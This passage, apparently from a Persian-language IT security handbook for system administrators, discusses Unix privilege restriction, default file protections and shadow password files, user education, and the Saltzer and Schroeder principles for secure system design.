ﺍﻳﻨﮕﻮﻧﻪ ﻣﺴﺎﺋﻞ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺗﺎ ﻧﺎﺭﺳﺎﻳﻲﻫﺎﻱ ﻃﺮﺍﺣﻲ ﺩﺭﻭﻧﻲ ﺳﻴﺴﺘﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ Unixﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﻣﻄﻤﺌﻦ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ .ﻣﺎ ﻣﻌﺘﻘﺪﻳﻢ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦﺗـﺮ ﺑﺎﺷـﻨﺪ،
ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ.
ﺍﻧﺘﻈﺎﺭﺍﺕ ﻭ ﺍﻣﻴﺪﻭﺍﺭﻳﻬﺎ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺭ ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ Unixﺭﺍ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺑﺒﻴﻨﻨﺪ .ﺗﺠﺮﺑﺔ ﺁﻧﻬﺎ ﺍﺯ Unixﺩﺭ ﻛﺎﺭﻫـﺎﻱ ﻋﻠﻤـﻲ ،ﺳـﺮﮔﺮﻣﻲ ،ﻭ
ﺗﺤﻘﻴﻘﺎﺗﻲ ،ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻮﺩﻩ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻤﺔ ﺷﺎﺧﻪﻫﺎ ﻭ ﺍﻏﻠﺐ ﻓﺮﺍﻣﻴﻦ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ .ﻛـﺎﺭﺑﺮﺍﻥ ﺷـﺎﻳﺪ ﻋـﺎﺩﺕ ﻛـﺮﺩﻩ
ﺑﺎﺷﻨﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻫﻤﭽﻨﻴﻦ ﻏﺎﻟﺒﹰﺎ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭ
ﻻ ﺩﺳﺘﺮﺳﻲ ﺳﻄﺢ ﺳﻴﺴﺘﻤﻲ )ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ( ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺁﻥ ﻻﺯﻡ
ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺴﺎﺯﻧﺪ ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ؛ ﻛﺎﺭﻱ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ.
Multi User
Multitask
26
27
٢٦٣
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﺍﻳﻦ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺧﻼﻑ ﻳﻚ ﻣﻨﺶ ﺧﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﻗـﻮﻱﺗـﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﻢ ﻻﺯﻡ ﺍﺳـﺖ ﻣـﺪﻳﺮﺍﻥ ﻭ
ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎ ﮔﻬﮕﺎﻩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﭼﻨﺪﺍﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻔـﺸﺎﻥ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﮐﻨﻨﺪ .ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺵ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻣﺘﻨﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻻﺯﻡ ﻧﻴﺴﺖ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ
ﺑﺘﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﺷﺒﻜﻪ ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ،ﻛﺎﺭﺑﺮﺍﻥ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ
ﺁﺯﻣﺎﻳﺶ ﻧﺸﺪﻩ ﻭ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﺩﻭﺭﻩﺩﻳﺪﻩ ﻭ ﻣﺠﺎﺯ ﺗﺄﻳﻴﺪ ﻧﺸﺪﻩ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ.
ﺭﺍﻫﺒﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺑﺮﺩ ﺑﺮﺧﻲ ﺍﺯ ﺍﺻﻮﻝ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺣﺪ ﻣﻌﻘﻮﻝ ،ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺎﻻ ﺑﺒﺮﻧـﺪ .ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺑﺠـﺎﻱ ﺣـﺬﻑ ﻫﻤـﺔ
ﻛﺎﻣﭙﺎﻳﻠﺮﻫﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺍﺯ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ،ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻀﻮ ﺩﺭ ﻳـﻚ ﮔـﺮﻭﻩ ﻛـﺎﺭﺑﺮﻱ
ﺧﺎﺹ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻳﻨﮕﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ
ﻛﻪ ﺩﻗﺘﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺭﺩﻩﻫـﺎﻱ ﺍﺑـﺰﺍﺭ
ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ ،ﻣﺎﻧﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺒﺎﺭ .Usenetﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺩﻳﺪﮔﺎﻩ ﺳﻨﺘﻲ ﺑﻪ "ﺩﺍﺩﻩ" ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ
)ﺍﺯ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ( ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺠﺎﻱ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺑﺮﺍﻱ ﻫﻤﻪ ،ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﻣﺤﺎﻓﻈﺖ ﺷـﻮﻧﺪ .ﺗﻨﻈـﻴﻢ ﺻـﺤﻴﺢ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ،ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺎﻳﻪﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ٢٨ﺩﻭ ﻣﺜﺎﻝ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﺳﺎﺩﻩ
ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺗﻤﺎﻡ Unixﺑﻬﺒﻮﺩ ﺑﺨﺸﺪ.
ﺣﻴﺎﺗﻲﺗﺮﻳﻦ ﻭﺟﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ Unixﻭﺍﺩﺍﺭ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺍﺳﺖ .ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑـﻪ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺷﺨﺼﻲ ﻗﺒﻞ ﺍﺯ Microsoft Windwos NTﻋﺎﺩﺕ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺒﺘﻨﻲ ﺑﺮ NTﻧﻴﺰ ﺻﺪﻕ ﻣﻲﻛﻨﺪ .ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﺗﺤـﺼﻴﻼﺕ ،ﺁﮔـﺎﻫﻲ ،ﻭ ﺍﻳﺠـﺎﺩ ﺍﻧﮕﻴـﺰﻩ ﺍﺳـﺖ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻫﺴﺘﻨﺪ ،ﻭﻟﻲ ﺗﺠﺮﺑﻪ ﻛﺮﺍﺭﹰﺍ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻣﺸﻜﻼﺕ ﻓﺮﺩﻱ ﺑﺎ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻓﻨـﺎﻭﺭﻱ ﻗﺎﺑـﻞ ﺣـﻞ
ﻧﻴﺴﺘﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻲ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ ﻛﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻧﭽـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﻛﻤﺘـﺮ
ﺗﻬﺪﻳﺪﻛﻨﻨﺪﻩ ﺑﻮﺩ .ﺑﺎ ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺕ ﻣﻮﺟﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﻫﻤﻜﺎﺭﻱ ﺁﻧﺎﻥ ﭼﻘﺪﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻛﻨـﺪ،
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ .ﺑﺎ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﺻﺤﻴﺢ ﺩﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ ،ﺁﻧﻬﺎ ﺭﺍ ﺑﺨـﺸﻲ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ
ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﻴﺪ .ﺁﻣﻮﺯﺵ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﻬﺘﺮ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻧﺘﻴﺠﻪ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﻫﻢ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ .ﺁﻣﻮﺯﺵ ﺑﺪﻭﻥ ﺍﻧﮕﻴﺰﺵ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﻪ
ﺁﻥ ﻣﻔﻬﻮﻡ ﺑﺎﺷﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻋﻤﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﺪﻭﻥ ﺁﻣﻮﺯﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﻛﺎﺭﻫﺎﻱ
ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ،ﺷﻜﺎﻑ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
Shadow Password Files
28
٢٦٥
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺩﻭﻡ
ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳﻲ ﺍﺭﺍﺋﻪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺑﺤﺚ ﻣﻲﻛﻨﺪ ،ﻭ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ
ﻛﻪ ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺣﻤﻠﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺘﺪﺍﻭﻝ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ ﻭ ﻣﻄﺎﻟﻌﺔ ﻣﻮﺭﺩﻱ ﻳﻚ ﻧﻤﻮﻧﻪ
ﺣﻤﻠﻪ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ.
ﺍﻣﻨﻴﺖ ﻭ ﺭﺍﻫﺒﺮﺍﻥ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻫﺒﺮ ﻓﻨﻲ ،ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻛـﺎﺭ
ﻛﻨﻨﺪ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺗﻌﺎﺭﻳﻒ ﺭﺳﻤﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﻣﻔﻴـﺪ ﺑـﺮﺍﻱ ﺭﺍﻫﺒـﺮﺍﻥ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻳﻨﻜـﻪ" :ﻳـﻚ
ﻛﺎﻣﭙﻴﻮﺗﺮ ﺩﺭﺻﻮﺭﺗﻲ ﺍﻳﻤﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﺵ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ ﻛﻪ ﺁﻧﻄﻮﺭ ﺭﻓﺘﺎﺭ ﻛﻨﻨﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ".
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻛﺮﺩﻩﺍﻳﺪ ﺗﺎ ﭼﻨﺪ ﻫﻔﺘﻪ ﺩﺭ ﺁﻥ ﺑﻤﺎﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ ﻫﻤﭽﻨﺎﻥ ﻧﺎﺧﻮﺍﻧـﺪﻩ ﺑﻤﺎﻧـﺪ،
ﺁﻧﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻣﻨﻴﺖ ﻳﻚ ﻭﻇﻴﻔﺔ ﺣﺴﺎﺱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻧﻘﺸﻬﺎﻱ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﺳﺖ .ﺑـﺎ ﺍﻳـﻦ ﺗﻌﺮﻳـﻒ ،ﻓﺎﺟﻌـﻪﻫـﺎﻱ
ﻃﺒﻴﻌﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﻜﺎﻝﺩﺍﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺗﻬﺪﻳﺪ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ.
ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺿﻌﻴﻒ ﻧﻮﺷﺘﻪ ﺷﺪﻩ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳﻤﻦ ﺁﺳﺎﻥ ﻧﻴﺴﺖ .ﺩﺭ ﺳﺎﻝ ،۱۹۷۵ﺟﺮﻭﻡ ﺳﺎﻟﺰﺭ ٢٩ﻭ ﺍﻡ .ﺩﻱ .ﺷـﺮﻭﺩﺭ ،٣٠ﻫﻔـﺖ ﻣﻌﻴـﺎﺭ ﺑـﺮﺍﻱ
ﺑﻨﺎﻱ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺗﻌﺮﻳﻒ ﻛﺮﺩﻧﺪ .ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻫﺮ ﻛﺎﺭﺑﺮ ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﺑﺎﻳﺪ ﺍﺯ ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﺑـﺪﺧﻮﺍﻩ
ﻭ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺗﻮﺳﻂ ﺧﻄﺎﻫﺎ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ .ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﻮﻧﺪ،
ﺑﺎﻳﺪ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﻪ ﺁﻧﻬﺎ ﺍﺧﺘﺼﺎﺹ ﻳﺎﺑﻨﺪ.
ﻣﻜﺎﻧﻴﺰﻡ ﺍﻗﺘﺼﺎﺩﻱ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻛﻮﭼﻚ ﻭ ﺳﺎﺩﻩ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻭ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ.
ﻣﻴﺎﻧﺠﻴﮕﺮﻱ ﻛﺎﻣﻞ
ﻫﺮ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﺍﺷﺘﻦ ﻣﺠﻮﺯ ﺻﺤﻴﺢ ﻛﻨﺘﺮﻝ ﺷﻮﺩ.
Jerome Saltzer
M. D. Schroder
29
30
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ
٢٦٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻃﺮﺍﺣﻲ ﺑﺎﺯ
٣١
ﺍﻳﻤﻨﻲ ﻧﺒﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺟﻬﻞ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺿﺎﺑﻄﻪ ﺍﺯ ﻭﺟﻮﺩ ﺩﺭﺏ ﻣﺨﻔﻲ ﺳﻴﺴﺘﻢ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺁﻧـﺮﺍ ﻣـﻲﺷﻨﺎﺳـﻨﺪ
ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺩﻫﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ.
ﺟﺪﺍﺳﺎﺯﻱ ﺩﺳﺘﺮﺳﻴﻬﺎ
